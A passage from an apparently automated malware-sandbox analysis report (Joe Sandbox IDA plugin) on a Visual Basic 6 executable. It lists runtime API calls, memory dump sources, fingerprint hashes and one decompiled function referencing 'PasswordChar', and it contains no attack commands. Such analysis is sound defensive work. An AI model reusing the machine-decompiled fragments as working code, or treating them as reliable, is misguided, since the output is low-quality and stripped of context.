                                                          • Part of subcall function 00424570: __vbaStrCopy.MSVBVM60(72A26A76,00401978,72A26C30), ref: 004245C2
                                                          • Part of subcall function 00424570: __vbaStrCopy.MSVBVM60 ref: 004245CA
                                                          • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,?), ref: 004245E6
                                                          • Part of subcall function 00424570: __vbaStrCmp.MSVBVM60(0040F38C,00000000,?,?), ref: 004245EE
                                                          • Part of subcall function 00424570: __vbaFreeStr.MSVBVM60(?,?), ref: 00424600
                                                          • Part of subcall function 00424570: __vbaStrCmp.MSVBVM60(0040F38C,?,?,?), ref: 00424618
                                                          • Part of subcall function 00424570: __vbaLenBstr.MSVBVM60(00000000,?,?), ref: 00424629
                                                          • Part of subcall function 00424570: #616.MSVBVM60(?,-00000001,?,?), ref: 0042463C
                                                          • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424647
                                                          • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(004117A4,00000000,?,-00000001,?,?), ref: 00424655
                                                          • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042465C
                                                          • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 00424663
                                                          • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 0042466A
                                                          • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(00411B14,00000000,?,-00000001,?,?), ref: 00424672
                                                          • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,-00000001,?,?), ref: 00424679
                                                          • Part of subcall function 00424570: __vbaStrMove.MSVBVM60(?,00000000,?,-00000001,?,?), ref: 0042468A
                                                          • Part of subcall function 00424570: __vbaStrCat.MSVBVM60(00000000,?,-00000001,?,?), ref: 0042468D
                                                        • __vbaStrCopy.MSVBVM60(href,00420DD4,?,coords,00080001,?,shape,rectangle,?,0040F3C8,00420F4F,?), ref: 0042026F
                                                        • __vbaFreeStr.MSVBVM60(0042029F,?,?,?,?,?,?,?,?,00401D26), ref: 00420298
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Move$CopyFree$#616Bstr
                                                        • String ID: <area$circle$coords$href$polygon$rectangle$shape
                                                        • API String ID: 2048072741-4243157096
                                                        • Opcode ID: 2494ec18348d9b55e87675e74de61997e1f958db62a68283ada1f942f2229400
                                                        • Instruction ID: 37bbe1c646a04cea47341a5b02a1ee3a9c1d4317476bd568df87fefc4746acc8
                                                        • Opcode Fuzzy Hash: 2494ec18348d9b55e87675e74de61997e1f958db62a68283ada1f942f2229400
                                                        • Instruction Fuzzy Hash: C5315071A00219EFCB00DB95D945EFFF7F8EF94700B60806BA511A32A1D7786D05CB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041E590: __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041E5F9
                                                          • Part of subcall function 0041E590: __vbaNew2.MSVBVM60(0040B730,?), ref: 0041E60E
                                                          • Part of subcall function 0041E590: __vbaObjSetAddref.MSVBVM60(?), ref: 0041E61B
                                                          • Part of subcall function 0041E590: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E646
                                                          • Part of subcall function 0041E590: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E65B
                                                          • Part of subcall function 0041E590: __vbaFreeVar.MSVBVM60 ref: 0041E667
                                                          • Part of subcall function 0041E590: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E691
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C2C6
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001E8), ref: 0041C2E9
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041C2F2
                                                        • __vbaVarForInit.MSVBVM60(?,?,?,?,?,?), ref: 0041C335
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C351
                                                        • __vbaI4Var.MSVBVM60(?), ref: 0041C378
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C38F
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C39C
                                                        • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041C3CD
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041C3ED
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041C3F6
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041C3FF
                                                        • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041C414
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$BoundsErrorGenerate$AddrefInitNew2NextRedimText
                                                        • String ID:
                                                        • API String ID: 3227237787-0
                                                        • Opcode ID: 899f88996e62988197f70b28ac8fe2fba82cc2ea73305debac50e6c58d0c5806
                                                        • Instruction ID: 8021d3ac604f1cd073d0d69ec38083b76a2f35fe1ad422b5f63be83236697dae
                                                        • Opcode Fuzzy Hash: 899f88996e62988197f70b28ac8fe2fba82cc2ea73305debac50e6c58d0c5806
                                                        • Instruction Fuzzy Hash: 55611EB1900249EFDB04DFA5DD88AEEFBB9FF58300F10415AE506A7260DB745985CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041EF00: __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041EF69
                                                          • Part of subcall function 0041EF00: __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EF7E
                                                          • Part of subcall function 0041EF00: __vbaObjSetAddref.MSVBVM60(?), ref: 0041EF8B
                                                          • Part of subcall function 0041EF00: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EFB6
                                                          • Part of subcall function 0041EF00: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EFCB
                                                          • Part of subcall function 0041EF00: __vbaFreeVar.MSVBVM60 ref: 0041EFD7
                                                          • Part of subcall function 0041EF00: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041F001
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C4FC
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001E8), ref: 0041C51F
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041C528
                                                        • __vbaVarForInit.MSVBVM60(?,?,?,?,?,?), ref: 0041C56C
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041C588
                                                        • __vbaI4Var.MSVBVM60(?), ref: 0041C5AF
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C5C6
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041C5D3
                                                        • __vbaStrVarVal.MSVBVM60(?,00401D26), ref: 0041C604
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004110D8,000001EC), ref: 0041C624
                                                        • __vbaFreeStr.MSVBVM60 ref: 0041C62D
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041C636
                                                        • __vbaVarForNext.MSVBVM60(?,?,?), ref: 0041C64B
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$BoundsErrorGenerate$AddrefInitNew2NextRedimText
                                                        • String ID:
                                                        • API String ID: 3227237787-0
                                                        • Opcode ID: 21ef237a613bf7da8c69d732572fa9a2c50ea11843046ceb4d1ebfe4f7b7f9f3
                                                        • Instruction ID: 783ad02440414d3d6f1bec500050ec52a1cc75d5921ed22cab52173475bd86b6
                                                        • Opcode Fuzzy Hash: 21ef237a613bf7da8c69d732572fa9a2c50ea11843046ceb4d1ebfe4f7b7f9f3
                                                        • Instruction Fuzzy Hash: E5512CB1900259EFDB14DFA4DD88AEEBBB9FF48300F108169E506E7250EB74A945CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34,?,?,72A46AEE,00000000,?), ref: 00423AB9
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000048), ref: 00423AEC
                                                        • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 00423B08
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,027EF774,004104C8,00000048), ref: 00423B35
                                                        • __vbaI4Str.MSVBVM60(?), ref: 00423B44
                                                        • __vbaI4Str.MSVBVM60(?,00000000), ref: 00423B4E
                                                        • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00423B76
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckHresultNew2$FreeList
                                                        • String ID:
                                                        • API String ID: 1549294082-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 0fe2451bce0b723a07b1f93d9cac36706b57eef32be5b28af73380462c7e1869
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: 9D51F670740228ABDB208F15DE46FEAB778EF54702F404096FA08B7190D6BC5E85CFA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 22%
                                                        			E004187F0(void* __ebx, void* __edi, void* __esi, void* _a4, void* _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v16;
                                                        				char _v20;
                                                        				intOrPtr _v24;
                                                        				intOrPtr* _v28;
                                                        				void* _v40;
                                                        				intOrPtr _v44;
                                                        				char* _v48;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v56;
                                                        				short _v60;
                                                        				char _v64;
                                                        				intOrPtr _v68;
                                                        				intOrPtr _v92;
                                                        				intOrPtr _t59;
                                                        				intOrPtr* _t61;
                                                        				intOrPtr _t63;
                                                        				short _t65;
                                                        				void* _t93;
                                                        				void* _t95;
                                                        				intOrPtr* _t96;
                                                        
                                                        				_t96 = _t95 - 0x18;
                                                        				 *[fs:0x0] = _t96;
                                                        				L00401D20();
                                                        				_v28 = _t96;
                                                        				_v24 = 0x401558;
                                                        				_v20 = 0;
                                                        				_v16 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t93);
                                                        				_v8 = 1;
                                                        				__imp____vbaStrCopy();
                                                        				_v8 = 2;
                                                        				__imp____vbaOnError(0xffffffff);
                                                        				_v8 = 3;
                                                        				__imp____vbaStrCopy();
                                                        				_v8 = 4;
                                                        				_t59 = _a4;
                                                        				if( *((intOrPtr*)(_t59 + 0x70)) != 0) {
                                                        					_v8 = 5;
                                                        					__imp____vbaLenBstr( *((intOrPtr*)(_a4 + 0x54)));
                                                        					if(_t59 == 0) {
                                                        						_v8 = 8;
                                                        						_v64 = 0;
                                                        						E0040F5DC();
                                                        						__imp____vbaSetSystemError( *((intOrPtr*)(_a4 + 0x70)), 0xcc, 0,  &_v64);
                                                        					} else {
                                                        						_v8 = 6;
                                                        						_t65 = _a4;
                                                        						__imp__#516( *((intOrPtr*)(_t65 + 0x54)));
                                                        						_v60 = _t65;
                                                        						_v64 = 0;
                                                        						E0040F5DC();
                                                        						__imp____vbaSetSystemError( *((intOrPtr*)(_a4 + 0x70)), 0xcc, _v60,  &_v64);
                                                        					}
                                                        				}
                                                        				_v8 = 0xb;
                                                        				_v48 = L"PasswordChar";
                                                        				_v56 = 8;
                                                        				L00401D20();
                                                        				_t61 = _t96;
                                                        				 *_t61 = _v56;
                                                        				 *((intOrPtr*)(_t61 + 4)) = _v52;
                                                        				 *(_t61 + 8) = _v48;
                                                        				 *((intOrPtr*)(_t61 + 0xc)) = _v44;
                                                        				_t63 =  *((intOrPtr*)( *_a4 + 0x390))(_a4);
                                                        				asm("fclex");
                                                        				_v68 = _t63;
                                                        				if(_v68 >= 0) {
                                                        					_v92 = 0;
                                                        				} else {
                                                        					_t63 = _a4;
                                                        					__imp____vbaHresultCheckObj(_v68, _t63, 0x40f430, 0x390);
                                                        					_v92 = _t63;
                                                        				}
                                                        				__imp____vbaFreeStr(0x41898f);
                                                        				return _t63;
                                                        			}
























                                                        0x004187f3
                                                        0x00418802
                                                        0x0041880e
                                                        0x00418816
                                                        0x00418819
                                                        0x00418820
                                                        0x00418827
                                                        0x00418837
                                                        0x0041883a
                                                        0x00418847
                                                        0x0041884d
                                                        0x00418856
                                                        0x0041885c
                                                        0x0041886c
                                                        0x00418872
                                                        0x00418879
                                                        0x00418880
                                                        0x00418886
                                                        0x00418894
                                                        0x0041889c
                                                        0x004188df
                                                        0x004188e6
                                                        0x004188ff
                                                        0x00418904
                                                        0x0041889e
                                                        0x0041889e
                                                        0x004188a5
                                                        0x004188ac
                                                        0x004188b2
                                                        0x004188b6
                                                        0x004188d2
                                                        0x004188d7
                                                        0x004188d7
                                                        0x0041889c
                                                        0x0041890a
                                                        0x00418911
                                                        0x00418918
                                                        0x00418924
                                                        0x00418929
                                                        0x0041892e
                                                        0x00418933
                                                        0x00418939
                                                        0x0041893f
                                                        0x0041894b
                                                        0x00418951
                                                        0x00418953
                                                        0x0041895a
                                                        0x00418979
                                                        0x0041895c
                                                        0x00418966
                                                        0x0041896e
                                                        0x00418974
                                                        0x00418974
                                                        0x00418988
                                                        0x0041898e

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401D26), ref: 0041880E
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401D26), ref: 00418847
                                                        • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401D26), ref: 00418856
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401D26), ref: 0041886C
                                                        • __vbaLenBstr.MSVBVM60(?), ref: 00418894
                                                        • #516.MSVBVM60(?), ref: 004188AC
                                                        • __vbaSetSystemError.MSVBVM60(00000000,000000CC,?,00000000), ref: 004188D7
                                                        • __vbaSetSystemError.MSVBVM60(00000000,000000CC,00000000,00000000), ref: 00418904
                                                        • __vbaChkstk.MSVBVM60 ref: 00418924
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040F430,00000390), ref: 0041896E
                                                        • __vbaFreeStr.MSVBVM60(0041898F), ref: 00418988
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$Error$ChkstkCopySystem$#516BstrCheckFreeHresult
                                                        • String ID: PasswordChar
                                                        • API String ID: 767474922-4263504495
                                                        • Opcode ID: 17ca0a96e64a1b5c62d453681d4e3af68561ba07f5b18bf80779097b4e8d2918
                                                        • Instruction ID: 779765b95c1925624557bf2a055067721e34559cc8402dc6b104e5801139ceda
                                                        • Opcode Fuzzy Hash: 17ca0a96e64a1b5c62d453681d4e3af68561ba07f5b18bf80779097b4e8d2918
                                                        • Instruction Fuzzy Hash: DA51C6B4900208EFDB04DF94C988BEEBBB5FF48704F108169E515AB3A0CB799A45CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041DB10: __vbaNew2.MSVBVM60(0040B730,00000000,00000000,00000000,?), ref: 0041DB5C
                                                          • Part of subcall function 0041DB10: __vbaObjSetAddref.MSVBVM60(?,?,00000000,00000000,?), ref: 0041DB69
                                                          • Part of subcall function 0041DB10: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DB94
                                                          • Part of subcall function 0041DB10: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041DBA1
                                                          • Part of subcall function 0041DB10: __vbaFreeVar.MSVBVM60 ref: 0041DBAC
                                                          • Part of subcall function 0041DB10: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041DBE1
                                                          • Part of subcall function 0041DB10: __vbaObjSet.MSVBVM60(?,?), ref: 0041DBEE
                                                          • Part of subcall function 0041DB10: __vbaFreeObj.MSVBVM60(0041DC27), ref: 0041DC20
                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041DCB9
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041DCCE
                                                        • __vbaObjSetAddref.MSVBVM60(?), ref: 0041DCDB
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DD06
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041DD1B
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041DD27
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DD51
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041DD74
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041DD81
                                                        • __vbaVarMove.MSVBVM60 ref: 0041DD94
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041DD9D
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041DDC7
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041DDDC
                                                        • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,72A1A274), ref: 0041DDEC
                                                        • __vbaFreeObj.MSVBVM60(0041DE20), ref: 0041DE19
                                                        • __vbaErrorOverflow.MSVBVM60(?,00000000,00000000,72A1A274), ref: 0041DE36
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$Error$AddrefBoundsGenerateNew2Text$EraseMoveOverflowRedim
                                                        • String ID:
                                                        • API String ID: 504347678-0
                                                        • Opcode ID: 48e808211b2ece66a89fc9500f0560853026e4968efcd41fec2109b93d23f16d
                                                        • Instruction ID: 854498418e14e9ee3c0fc25b9085136d71577cca2ed3780dbbf1bf8355da2cb2
                                                        • Opcode Fuzzy Hash: 48e808211b2ece66a89fc9500f0560853026e4968efcd41fec2109b93d23f16d
                                                        • Instruction Fuzzy Hash: BB5171B0E00219AFDB14DFA4DD88EEEB7B9FF88705F008119F555AB2A0D7789845CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041E450: __vbaNew2.MSVBVM60(0040B730,?,00000000,?,00401668), ref: 0041E49C
                                                          • Part of subcall function 0041E450: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,00401668), ref: 0041E4A9
                                                          • Part of subcall function 0041E450: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E4D4
                                                          • Part of subcall function 0041E450: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E4E1
                                                          • Part of subcall function 0041E450: __vbaFreeVar.MSVBVM60 ref: 0041E4EC
                                                          • Part of subcall function 0041E450: __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041E521
                                                          • Part of subcall function 0041E450: __vbaObjSet.MSVBVM60(?,?), ref: 0041E52E
                                                          • Part of subcall function 0041E450: __vbaFreeObj.MSVBVM60(0041E567), ref: 0041E560
                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041E5F9
                                                        • __vbaNew2.MSVBVM60(0040B730,?), ref: 0041E60E
                                                        • __vbaObjSetAddref.MSVBVM60(?), ref: 0041E61B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E646
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E65B
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E667
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E691
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041E6B4
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041E6C1
                                                        • __vbaVarMove.MSVBVM60 ref: 0041E6D4
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041E6DD
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041E707
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041E71C
                                                        • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,72A1A274), ref: 0041E72C
                                                        • __vbaFreeObj.MSVBVM60(0041E760), ref: 0041E759
                                                        • __vbaErrorOverflow.MSVBVM60(?,00000000,00000000,72A1A274), ref: 0041E776
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$Error$AddrefBoundsGenerateNew2Text$EraseMoveOverflowRedim
                                                        • String ID:
                                                        • API String ID: 504347678-0
                                                        • Opcode ID: 25a1c3befd997c7e03a07d7e53f24812b5889649f90fca6093263f934ed64c0d
                                                        • Instruction ID: 8d8a322bf0015829083212b0257836bc7f1c301babde4db3d53e1b8fcbf7065c
                                                        • Opcode Fuzzy Hash: 25a1c3befd997c7e03a07d7e53f24812b5889649f90fca6093263f934ed64c0d
                                                        • Instruction Fuzzy Hash: D0519674A00219AFDB14DF95CD89EEEBBB9FF58705F004119FA01A72A0D774A885CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0041EDC0: __vbaNew2.MSVBVM60(0040B83C,?,00000000,?,?), ref: 0041EE0C
                                                          • Part of subcall function 0041EDC0: __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0041EE19
                                                          • Part of subcall function 0041EDC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EE44
                                                          • Part of subcall function 0041EDC0: __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EE51
                                                          • Part of subcall function 0041EDC0: __vbaFreeVar.MSVBVM60 ref: 0041EE5C
                                                          • Part of subcall function 0041EDC0: __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041EE91
                                                          • Part of subcall function 0041EDC0: __vbaObjSet.MSVBVM60(?,?), ref: 0041EE9E
                                                          • Part of subcall function 0041EDC0: __vbaFreeObj.MSVBVM60(0041EED7), ref: 0041EED0
                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,0000000C,00000001,-00000001,00000000,?,00000000,00000000,72A1A274), ref: 0041EF69
                                                        • __vbaNew2.MSVBVM60(0040B83C,?), ref: 0041EF7E
                                                        • __vbaObjSetAddref.MSVBVM60(?), ref: 0041EF8B
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EFB6
                                                        • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EFCB
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041EFD7
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041F001
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041F024
                                                        • __vbaGenerateBoundsError.MSVBVM60 ref: 0041F031
                                                        • __vbaVarMove.MSVBVM60 ref: 0041F044
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041F04D
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041F077
                                                        • __vbaObjSet.MSVBVM60(?,?), ref: 0041F08C
                                                        • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,72A1A274), ref: 0041F09C
                                                        • __vbaFreeObj.MSVBVM60(0041F0D0), ref: 0041F0C9
                                                        • __vbaErrorOverflow.MSVBVM60(?,00000000,00000000,72A1A274), ref: 0041F0E6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256715772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000007.00000002.2256712625.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256730665.0000000000422000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256733912.0000000000423000.00000020.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256739325.000000000042A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000007.00000002.2256743297.000000000042D000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_tmp_e473b4.jbxd
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$Error$AddrefBoundsGenerateNew2Text$EraseMoveOverflowRedim
                                                        • String ID:
                                                        • API String ID: 504347678-0
                                                        • Opcode ID: c0e263ebe6c96ca4a770220e6563f5187304d2d2e5baecf2686758a9dcf6c76c
                                                        • Instruction ID: e24812112e04b45a5ba54ce6e2ee454485eb8960c8ac5a87c6d8bf6bc291ae3f
                                                        • Opcode Fuzzy Hash: c0e263ebe6c96ca4a770220e6563f5187304d2d2e5baecf2686758a9dcf6c76c
